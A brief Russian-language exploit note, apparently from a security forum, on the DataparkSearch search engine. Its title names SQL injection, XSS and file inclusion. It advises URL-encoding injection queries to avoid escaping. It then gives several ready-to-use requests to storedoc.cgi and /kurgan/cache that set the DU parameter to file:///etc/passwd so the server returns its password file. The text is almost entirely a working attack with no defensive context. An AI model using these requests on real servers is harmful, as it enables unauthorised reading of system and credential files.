DataparkSearch Engine, SQL injection, XSS, Cross Site Scripting, File Include
DataparkSearch

Все SQL-inject запросы надо кодировать в Urlencode ALL, иначе экранируются.
В фаиле storedoc.cgi
Чтение фаилов: /etc/passwd
в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146
/kurgan/cache?DU=file:///etc/passwd
/kurgan/cache?DU=file%3a%2f%2f%2fetc%2fpasswd
